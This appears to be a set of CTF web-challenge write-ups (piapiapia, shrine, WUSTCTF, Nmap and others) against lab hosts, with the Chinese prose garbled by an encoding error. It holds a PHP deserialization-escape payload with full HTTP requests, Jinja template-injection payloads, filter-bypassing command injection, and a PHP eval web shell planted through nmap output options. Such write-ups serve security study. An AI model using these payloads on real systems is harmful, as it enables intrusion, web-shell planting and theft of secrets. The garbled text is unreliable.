²é¿´¸÷½×¶Î±äÁ¿ÄÚÈÝ:
from urllib.parse import urlsplit, urlparse, urlunsplit
from urllib.request import urlopen
host = "file://suctf.c?sr/local/nginx/conf/nginx.conf"
if host == 'suctf.cc':
print("ÎÒÞÐ your problem? 111")
parts = list(urlsplit("file://suctf.c?sr/local/nginx/conf/nginx.conf"))
print("parts", parts)
host = parts[1]
if host == 'suctf.cc':
print("ÎÒÞÐ your problem? 222 " + host)
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
print('newhost', newhost)
print('parts', parts)
print("host", host)
finalUrl = urlunsplit(parts).split(' ')[0]
print("finalUrl", finalUrl)
host = urlparse(finalUrl).hostname
print("host", host)
if host == 'suctf.cc':
print("success")
else:
print("ÎÒÞÐ your problem? 333")
References
https://www.codenong.com/cs109743728/
https://blog.csdn.net/qq_42812036/article/details/104291695
https://blog.csdn.net/qq_42181428/article/details/99741920
https://www.cnblogs.com/wangtanzhi/p/12181032.html
[0CTF 2016]piapiapia
´ò¿ªÍøÒ³,·¢ÏֵǽҳÃæ,ÓÃdirsearch ɨÃè:
python dirsearch.py -u http://af08cedd-14b0-4ad9-a066-ffc4837ac7b7.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt ÊÇÎÒ×Ô¼º´´½¨µÄɨÃè×Öµä,ɨÃèºó·¢ÏÖwww.zip ,ÏÂÔغó²é¿´index.php :
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
Éó¼Æ´úÂë·¢ÏÖÿһ¸öphp Îļþ¶¼»áÓÐif($_SESSION['username']) ,À´¼ì²éµ±Ç°ÊÇ·ñµÇ¼,ËùÒÔÎÒÃÇÒªÔڵǽºó½øÐÐһϵÁвÙ×÷,²é¿´Ô´Îļþ·¢ÏÖ×¢²áÒ³Ãæ,ÔÚä¯ÀÀÆ÷·ÃÎÊ×¢²áÒ³Ãæ,ÊäÈëurl:
/register.php
½áºÏindex.php ÀïÃæµÄ¹ýÂ˹æÔò:
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
Ó÷ûºÏ¹æÔòµÄÓû§ÃûÃÜÂë×¢²á¡£ÈçÓû§Ãû1234 ,ÃÜÂë1234 ¡£×¢²áºóÒ³ÃæÏÔʾ:
Register OK!Please Login
µã»÷³¬Á´½ÓPlease Login ¡£Ìøתµ½/update.php Ò³Ãæ,²é¿´/update.php µÄÔ´´úÂë:
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
·¢ÏÖÕâÀïÒªÌá½»POST ÇëÇó¡£phone ,email ¶¼ÓÐÑϸñµÄÕýÔòÆ¥Åä¡£nickname µÄÕýÔòÊÇÆ¥Åä³ýÁË×ÖĸºÍÊý×ÖºÍÏ»®ÏßÍâµÄËùÓÐ×Ö·û,ÕâÀï¿ÉÒÔÓÃÊý×éÈƹý¼ì²é¡£
md5(Array()) = null
sha1(Array()) = null
ereg(pattern,Array()) = null
preg_match(pattern,Array()) = false
strcmp(Array(), "abc") = null
strpos(Array(),"abc") = null
strlen(Array()) = null
¼ì²éprofile.php Ô´´úÂë:
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>
·¢ÏÖ¿ÉÒÔ¿ØÖÆphoto ±äÁ¿,ʵÏÖÈÎÒâÎļþ¶ÁÈ¡¡£ÄÇÎÒÃǾÍÒªÕÒµ½flagÎļþ·¾¶,¼ÌÐø¼ì²éÆäËûÔ´´úÂë,·¢ÏÖconfig.php :
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
·¢ÏÖÕâÀïÓÐflag ±äÁ¿,ËäÈ»ÕâÀïʲô¶¼Ã»ÓÐ,µ«·þÎñÆ÷ÉÏÕâ¸öconfig.php Õâ¸öÅäÖÃÎļþ¿Ï¶¨µÄÅäÖúõÄ,Ö»Òª¶ÁÈ¡config.php ¾Í»áÊä³öflag¡£ËùÒÔÎÒÃÇÖ»Òª°Ñphoto ±äÁ¿¿ØÖÆΪconfig.php ¾Í¿ÉÒÔÁË¡£ÕÒÕÒ¿´ÄÄÀï¿ÉÒÔÐÞ¸Äphoto µÄÖµ,·¢ÏÖÖ»ÓÐ/update.php ¿ÉÒÔÐ޸ġ£ÔĶÁÔ´´úÂë:
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
µ±ÎÒÃÇPOST Êý¾Ýºó,ÐòÁл¯ºóϵͳµ÷ÓÃÁËupdate_profile º¯Êý,·¢ÏÖÔ´´úÂëÎļþÒ»¿ªÊ¼¾Í°üº¬require_once('class.php'); ÁË,˵Ã÷update_profile º¯ÊýÔÚclass.php ÎļþÀïÃæ¡£²é¿´class.php ÎļþÀïÃæµÄupdate_profile º¯Êý:
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
·¢ÏÖº¯ÊýÂß¼ÊÇÏȵ÷ÓÃÁ˹ýÂ˺¯Êýfilter ,È»ºó²Åµ÷ÓÃupdate ¸üÐÂÊý¾Ý¡£²é¿´filter º¯Êý:
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
·¢ÏÖº¯Êý¶ÔÎÒÃÇ´«½øÀ´µÄÐòÁл¯×Ö·û´®ÀïÃæµÄËùÓÐ'select', 'insert', 'update', 'delete', 'where' ¶¼»»³ÉÁËhacker ¡£ÎÒÃÇÖªµÀÐòÁл¯ºóµÄ×Ö·û´®,Èç¹û±»Ìæ»»,µ¼ÖÂÇ°ºó³¤¶È²»Ò»ÖÂ,»áµ¼ÖÂÐòÁл¯ÌÓÒÝ,Îå¸öµ¥´ÊÖ»ÓÐwhere Óëhacker ³¤¶È²»Ò»Ñù,Ò²¾ÍÊÇ˵Èç¹ûÎÒÃǵÄÐòÁл¯×Ö·û´®Ò»¿ªÊ¼´æÔÚwhere ºóÀ´±»Ìæ»»ÁË,¾Í¿ÉÒÔʵÏÖÐòÁл¯ÌÓÒÝ¡£ÀýÈçÎÒÃÇ´«Èë²ÎÊý,ÕâÀïÓñ¾µØÔËÐÐÄ£ÄâPOST Êý¾ÝºóµÄÐòÁл¯×Ö·û´®:
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'where";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
Êä³ö:
a:4:{s:5:"phone";s:5:"16515";s:5:"email";s:5:"16516";s:8:"nickname";a:1:{i:0;s:39:"where";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
µ±Õâ¸öÐòÁл¯×Ö·û´®±»filter ¹ýÂ˺ó,where ±»Ìæ»»³Éhacker ,µ«s:39 ²¢Ã»Óбä³És:40 ,Õâʱhacker";}s:5:"photo";s:10:"config.php";} ×îºóÒ»¸ö} ÔÚ·´ÐòÁл¯Ê±¾Í²»»á±»µ±×÷nickname µÄÒ»²¿·Ö¡£Èç¹ûÎÒÃÇÓÃ×ã¹»µÄwhere Ìæ»»ºó°Ñ";}s:5:"photo";s:10:"config.php";} ÕâÒ»´®È«²¿¼·³öÈ¥,photo ¾Í»á±»±»¸³ÖµÎªconfig.php ,È»ºó·þÎñÆ÷Êý¾Ý¿â±»¸üÐÂÊý¾Ý¡£ÒòΪ";}s:5:"photo";s:10:"config.php";} ³¤¶ÈÊÇ34,ËùÒÔÎÒÃÇÐèÒª34¸öwhere :
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
Êä³ö:
a:4:{s:5:"phone";s:5:"16515";s:5:"email";s:5:"16516";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
Õâ¸ö×Ö·û´®·´ÐòÁл¯ºóÊÇ:
array(4) {
["phone"]=>
string(5) "16515"
["email"]=>
string(5) "16516"
["nickname"]=>
array(1) {
[0]=>
string(204) "wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}"
}
["photo"]=>
string(39) "upload/3b4531574a3ce1a18acf558c509bd2c9"
}
µ±where ±»Ìæ»»³Éhacker ºó,·´ÐòÁл¯½á¹ûΪ:
array(4) {
["phone"]=>
string(5) "16515"
["email"]=>
string(5) "16516"
["nickname"]=>
array(1) {
[0]=>
string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
}
["photo"]=>
string(10) "config.php"
}
´Ëʱphoto ³É¹¦¸³ÖµÎªconfig.php ¡£ºóÃæµÄ
s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
±»¶ªÆúÁË¡£Òò´ËÖ»Òª°´ÕÕ
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
¾Í¿ÉÒԳɹ¦¸üÐÂÊý¾Ý¿â¡£ÔÚupdate.php Ò³ÃæÓÃBurp SuiteÀ¹½Ø,¹¹ÔìPOST ÇëÇó:
POST /update.php HTTP/1.1
Host: 2f36cbc9-7f23-4f6e-9d7f-eba47ddd89fd.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary14s0JCyoBGszyn62
Cookie: PHPSESSID=27fbeeb24fddf182d273b2339d801a69
Content-Length: 665
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="phone"
12345678901
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="email"
1234@qq.com
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="nickname[]"
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="photo"; filename="1234"
1234
------WebKitFormBoundary14s0JCyoBGszyn62--
×¢Òânickname ÒªÓÃÊý×éÈƹý¡£·¢Ëͺó,»áÌáʾÊý¾Ý¸üгɹ¦,È»ºó¹¹ÔìGET ÇëÇó:
GET /profile.php HTTP/1.1
Host: 2f36cbc9-7f23-4f6e-9d7f-eba47ddd89fd.node3.buuoj.cn
Cookie: PHPSESSID=27fbeeb24fddf182d273b2339d801a69
×¢Òâcookie ÏÂÃæ¿ÕÁ½ÐС£ÔÚÏìÓ¦ÀïµÃµ½base64 ±àÂë,½âÂëºó:
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = 'qwertyuiop';
$config['database'] = 'challenges';
$flag = 'flag{8c967b44-c6c2-4204-9790-c7f4fc6c0d20}';
?>
µÃµ½flag¡£
References
https://blog.csdn.net/zz_Caleb/article/details/96777110
https://mayi077.gitee.io/2020/02/01/0CTF-2016-piapiapia/
https://my.oschina.net/u/4337224/blog/3356061
http://f0r4o3.net/2020/07/30/0CTF 2016 piapiapia/
https://frystal.github.io/2019/11/08/0CTF-2016-piapiapia/
https://www.cnblogs.com/20175211lyz/p/11444134.html
http://yqxiaojunjie.com/index.php/archives/171/
[WesternCTF2018]shrine
½øÈëÍøÒ³,°´F12 ,·¢ÏÖflask Ô´´úÂë:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
os.environ.pop() Êǵ¯³öÖ¸¶¨µÄ»·¾³±äÁ¿¡£
References
https://www.cnblogs.com/Security-Darren/p/4179314.html
app.config['FLAG'] = os.environ.pop('FLAG')
×¢²áÁËÒ»¸öÃûΪFLAG µÄconfig ,²Â²âÕâ¾ÍÊÇflag,Èç¹ûûÓйýÂË¿ÉÒÔÖ±½Ó{{config}} ¼´¿É²é¿´ËùÓÐapp.config ÄÚÈÝ,µ«ÊÇÕâÌâÉèÁ˺ÚÃûµ¥[¡®config¡¯,¡®self¡¯] ²¢ÇÒ¹ýÂËÁËÀ¨ºÅ¡£
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
ÉÏÃæÕâÐдúÂë°ÑºÚÃûµ¥ÀïÃæµÄ['config', 'self'] ±éÀú²¢ÉèΪ¿Õ¡£
²é¿´flask ¹Ù·½Îĵµ¶Ô<path:shrine> µÄ½âÊÍ:
ͨ¹ý°Ñ URL µÄÒ»²¿·Ö±ê¼ÇΪ <variable_name> ¾Í¿ÉÒÔÔÚ URL ÖÐÌí¼Ó±äÁ¿¡£±ê¼ÇµÄ ²¿·Ö»á×÷Ϊ¹Ø¼ü×Ö²ÎÊý´«µÝ¸øº¯Êý¡£Í¨¹ýʹÓà <converter:variable_name> ,¿ÉÒÔÑ¡ÔñÐԵļÓÉÏÒ»¸öת»»Æ÷,Ϊ±äÁ¿Ö¸¶¨¹æÔò¡£Çë¿´ÏÂÃæµÄÀý×Ó:
from markupsafe import escape
@app.route('/user/<username>')
def show_user_profile(username):
return 'User %s' % escape(username)
@app.route('/post/<int:post_id>')
def show_post(post_id):
return 'Post %d' % post_id
@app.route('/path/<path:subpath>')
def show_subpath(subpath):
return 'Subpath %s' % escape(subpath)
References
https://dormousehole.readthedocs.io/en/latest/quickstart.html#id7
ÊäÈëurl
/shrine/{{2 * 2}}
·¢ÏÖ·µ»ØÕýÈ·¼ÆËã½á¹û,˵Ã÷´æÔÚÄ£°å×¢Èë¡£
ÊäÈëurl:
/shrine/{{url_for.__globals__}}
url_for Æä×÷ÓÃÊǽ«urlÓÃÓÚ¹¹½¨Ö¸¶¨º¯ÊýµÄURL ,ÔÙÅäºÏ__globals__ ,¸Ãº¯Êý»áÒÔ×ÖµäÀàÐÍ·µ»Øµ±Ç°Î»ÖõÄÈ«²¿È«¾Ö±äÁ¿¡£
References
https://www.jianshu.com/p/413a49db21f5
ÔÚÍøÒ³»ØÏÔÖз¢ÏÖcurrent_app ±äÁ¿,Ëü¼Ç¼ÁËÎÒÃǵ±Ç°ÔÚÄĸöapp ,¶øÎÒÃÇÒª·ÃÎʵľÍÊǵ±Ç°app ÀïÃæµÄconfig ,ËùÒÔÊäÈëurl:
/shrine/{{url_for.__globals__['current_app'].config.FLAG}}
»òÕß:
/shrine/{{url_for.__globals__.current_app.config.FLAG}}
½«url_for »»³Éget_flashed_messages ,Ò²¿ÉÒԵõ½flag¡£
get_flashed_messages ·µ»Ø֮ǰÔÚFlask ÖÐͨ¹ýflash() ´«ÈëµÄÉÁÏÖÐÅÏ¢ÁÐ±í¡£°Ñ×Ö·û´®¶ÔÏó±íʾµÄÏûÏ¢¼ÓÈëµ½Ò»¸öÏûÏ¢¶ÓÁÐÖÐ,È»ºóͨ¹ýµ÷ÓÃget_flashed_messages() ·½·¨È¡³ö(ÉÁÏÖÐÅÏ¢Ö»ÄÜÈ¡³öÒ»´Î,È¡³öºóÉÁÏÖÐÅÏ¢»á±»Çå¿Õ)¡£
References
https://zhuanlan.zhihu.com/p/93746437
https://www.cnblogs.com/wangtanzhi/p/12238779.html
[WUSTCTF2020]ÆÓʵÎÞ»ª
´ò¿ªÍøÒ³,·¢ÏÖhack me ÕâÑùµÄÌôÐÆÓïÑÔ,ÆäËûʲô¶¼Ã»ÓÐ,ÓÃdirsearchɨÃè:
python dirsearch.py -u http://b88f888e-4247-4b9c-bc92-01b7d5caff8a.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt ÊÇÎÒ×Ô¼º´´½¨µÄɨÃè×Öµä,ɨÃèºó·¢ÏÖ/robots.txt Îļþ,·ÃÎÊ/robots.txt :
User-agent: *
Disallow: /fAke_f1agggg.php
·¢ÏÖflagÎļþÊÇ/fAke_f1agggg.php ¡£ÓÃBurp Suite¹¹ÔìGET ÇëÇó,·ÃÎÊ/fAke_f1agggg.php :
GET /fAke_f1agggg.php HTTP/1.1
Host: b88f888e-4247-4b9c-bc92-01b7d5caff8a.node3.buuoj.cn
ÏìӦΪ:
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 24 Apr 2021 16:56:56 GMT
Content-Type: text/html
Content-Length: 22
Connection: keep-alive
Look_at_me: /fl4g.php
X-Powered-By: PHP/5.5.38
flag{this_is_not_flag}
·¢ÏÖ/fl4g.php Îļþ,·ÃÎÊ/fl4g.php ,³öÏÖÂÒÂë,ÓÃcharset ä¯ÀÀÆ÷²å¼þÐÞ¸ÄÍøÒ³±àÂëΪutf-8 ,·¢ÏÖÔ´´úÂë:
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "ÎÒ²»¾Òâ¼ä¿´ÁË¿´ÎÒµÄÀÍÁ¦Ê¿, ²»ÊÇÏ뿴ʱ¼ä, Ö»ÊÇÏë²»¾Òâ¼ä, ÈÃÄãÖªµÀÎÒ¹ýµÃ±ÈÄãºÃ.</br>";
}else{
die("½ðÇ®½â¾ö²»ÁËÇîÈ˵ı¾ÖÊÎÊÌâ");
}
}else{
die("È¥·ÇÖÞ°É");
}
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "Ïëµ½Õâ¸öCTFerÄõ½flagºó, ¸Ð¼¤ÌéÁã, ÅÜÈ¥¶«À½°¶, ÕÒÒ»¼Ò²ÍÌü, °Ñ³øʦºä³öÈ¥, ×Ô¼º³´Á½¸öÄÃÊÖС²Ë, µ¹Ò»±É¢×°°×¾Æ, Ö¸»ÓеÀ, ±ðѧС±©.</br>";
else
die("ÎҸϽôº°À´ÎҵľÆÈâÅóÓÑ, Ëû´òÁ˸öµç»°, °ÑËûÒ»¼Ò°²Åŵ½ÁË·ÇÖÞ");
}else{
die("È¥·ÇÖÞ°É");
}
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "Ïëµ½ÕâÀï, ÎÒ³äʵ¶øÐÀο, ÓÐÇ®È˵ĿìÀÖÍùÍù¾ÍÊÇÕâôµÄÆÓʵÎÞ»ª, ÇÒ¿ÝÔï.</br>";
system($get_flag);
}else{
die("¿ìµ½·ÇÖÞÁË");
}
}else{
die("È¥·ÇÖÞ°É");
}
?>
str_ireplace ÊÇstr_replace() µÄºöÂÔ´óСд°æ±¾¡£
º¯ÊýÔÐÍ:
str_ireplace ( mixed $search , mixed $replace , mixed $subject , int &$count = ? ) : mixed
¸Ãº¯Êý·µ»ØÒ»¸ö×Ö·û´®»òÕßÊý×é¡£¸Ã×Ö·û´®»òÊý×éÊǽ« subject ÖÐÈ«²¿µÄ search ¶¼±» replace Ìæ»»(ºöÂÔ´óСд)Ö®ºóµÄ½á¹û¡£
ÓÃphp5.6 ÔËÐÐ:
<?php
var_dump(intval('0x1234'));
var_dump(intval('0x1234'+1));
?>
¶ÔÓÚ×Ö·û´®intval »áÔÚ·ÇÊý×Ö×Ö·û½Ø¶Ï,·µ»Ø·ÇÊý×Ö×Ö·ûÇ°ÃæµÄÊý×Ö,¼ÓÉÏ1 ºó,»áÒÔ16 ½øÖÆ´¦Àí¡£»òÕßʹÓÿÆѧ¼ÆÊý·¨:
<?php
var_dump(intval('1e5'));
var_dump(intval('1e5'+1));
?>
¶ÔÓÚmd5 ÈõÀàÐͱȽÏ,¿ÉÒÔʹÓýű¾:
import hashlib
md5 = hashlib.md5()
def run():
i = 0
while True:
text = '0e{}'.format(i)
md5.update(text.encode('utf-8'))
m = md5.hexdigest()
print(text, ' ', m)
if m[0:2] == '0e' :
if m[2:].isdigit():
print('find it:',text,":",m)
break
i +=1
run()
References
https://blog.csdn.net/SopRomeo/article/details/106237931
ÔËÐкóÊÇ:
0e215962017
µÚ¶þ¸ö¾Í¿ÉÒÔÈƹýÁË¡£
!strstr($get_flag," ") ˵Ã÷²»ÄܳöÏÖ¿Õ¸ñ,ËùÒÔ¿ÉÒÔÓÃ$IFS$9 »òÕß%09 ´úÌæ¿Õ¸ñ,ÕâÀï½âÊÍÒ»ÏÂ${IFS} ,$IFS ,$IFS$9 µÄÇø±ð,Ê×ÏÈ$IFS ÔÚlinux ϱíʾ·Ö¸ô·û,Ö»ÓÐcat$IFSa.txt µÄʱºò,bash ½âÊÍÆ÷»á°ÑÕû¸öIFSa µ±×ö±äÁ¿Ãû,ËùÒÔµ¼ÖÂûÓа취ÔËÐÐ,È»¶øÈç¹û¼ÓÒ»¸ö{} ¾Í¹Ì¶¨Á˱äÁ¿Ãû,ͬÀíÔÚºóÃæ¼Ó¸ö$ ¿ÉÒÔÆ𵽽ضϵÄ×÷ÓÃ,¶ø$9 Ö¸µÄÊǵ±Ç°ÏµÍ³shell ½ø³ÌµÄµÚ¾Å¸ö²ÎÊýµÄ³ÖÓÐÕß,¾ÍÊÇÒ»¸ö¿Õ×Ö·û´®,Òò´Ë$9 Ï൱ÓÚûÓмӶ«Î÷,µÈÓÚ×öÁËÒ»¸öÇ°ºó¸ôÀë¡£
Ê×ÏȲéÕÒflagÔÚÄÄÀï,ÊäÈëurl:
/fl4g.php?num=1e5&md5=0e215962017&get_flag=ls
·¢ÏÖflagÎļþÊÇ:
fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
cat ¿ÉÒÔÓÃca\t »òÕßmore Èƹý¡£
ÊäÈëurl:
/fl4g.php?num=1e5&md5=0e215962017&get_flag=more$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
µÃµ½flag¡£
References
https://www.cnblogs.com/h3ng/p/12976168.html
[SWPU2019]Web1
todo×¢Èë²»ÁË¡£
[Íø¶¦± 2020 Öìȸ×é]Nmap
´ò¿ªÍøÒ³,·¢ÏÖÌáʾҪÓÃnmap ÃüÁî,²Î¿¼Ö®Ç°×ö¹ýµÄÌâ:
[BUUCTF 2018]Online Tool]
³¢ÊÔ֮ǰµÄÃüÁî:
' <?php @eval($_POST["password"]);?> -oG shell.php '
ÍøÒ³Ìáʾ:hacker ¡£ËµÃ÷Óйؼü´Ê±»¹ýÂË¡£
·½·¨Ò»
³¢ÊÔÌæ»»phpΪphml :
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
»òÕß:
' <? @eval($_POST["hack"]);?> -oG hack.phtml '
ÔÚÕý³£PHP5 ÖÐ,Ö§³ÖÈçÏÂ4ÖÖPHP±êÇ©:
- ͨ¹ý
<?php ±êÇ© - ͨ¹ý
<? ±êÇ© - ͨ¹ý
<% ±êÇ©(ĬÈϲ»¿ªÆô,PHP7ºó±»ÒƳý) - ͨ¹ý
<script language="php"> ±êÇ©(PHP7ºó±»ÒƳý)
References
https://www.leavesongs.com/PENETRATION/dynamic-features-and-webshell-tricks-in-php.html
·ÃÎÊ:
http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/hack.phml
·¢ÏÖ·ÃÎʳɹ¦,ÀûÓÃÒϽ£¿Õ°×ÇøÓòÓÒ»÷Ìí¼ÓÊý¾Ý,ÉèÖÃÈçÏÂ:
URLµØÖ· http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/hack.phml
Á¬½ÓÃÜÂë hack
ÍøÕ¾±¸×¢
±àÂëÉèÖà UTF8
Á¬½ÓÀàÐÍ PHP
ÆäËû²»±ä¡£ÃÜÂë¿ÉÒÔËæ±ãÉèÖÃ,Òª¸ú$_POST["hack"] Ò»Ö¡£
Á¬½Óºó²é¿´ÍøÕ¾Îļþ,ÔÚ¸ùĿ¼·¢ÏÖflag¡£
References
https://www.cnblogs.com/h3ng/p/12989057.html
·½·¨¶þ
-iL ´Óinputfilename ÎļþÖжÁȡɨÃèµÄÄ¿±ê¡£-oN °ÑɨÃè½á¹ûÖض¨Ïòµ½Ò»¸ö¿É¶ÁµÄÎļþlogfilename ÖС£
ÊäÈë:
' -iL /flag -oN vege.txt '
·ÃÎÊ:
http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/vege.txt
µÃµ½flag¡£
References
https://zhuanlan.zhihu.com/p/145906109
https://wgf4242.github.io/ctf/writeup/2020-Íø¶¦±Öìȸ×éwriteup.html#web-0x1-nmap
[MRCTF2020]PYWebsite
´ò¿ªÍøÒ³,·¢ÏÖÒª¹ºÂòflag,ÏÈÓÃdirsearchɨÃè:
python dirsearch.py -u http://node3.buuoj.cn:29832/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt ÊÇÎÒ×Ô¼º´´½¨µÄɨÃè×Öµä,ɨÃèºó·¢ÏÖflag.php ,·ÃÎÊflag.php ,ÍøÒ³Ìáʾ:
°ÝÍÐ,ÎÒÒ²ÊÇѧ¹ý°ëСʱÍøÂ簲ȫµÄ,ÄãƲ»ÁËÎÒ!ÎÒÒѾ°Ñ¹ºÂòÕßµÄIP ±£´æÁË,ÏÔÈ»ÄãûÓйºÂò¡£ÑéÖ¤Âß¼ÊÇÔÚºó¶ËµÄ,³ýÁ˹ºÂòÕߺÍÎÒ×Ô¼º ,ûÓÐÈË¿ÉÒÔ¿´µ½flag,»¹²»¿ìÈ¥Âò¡£
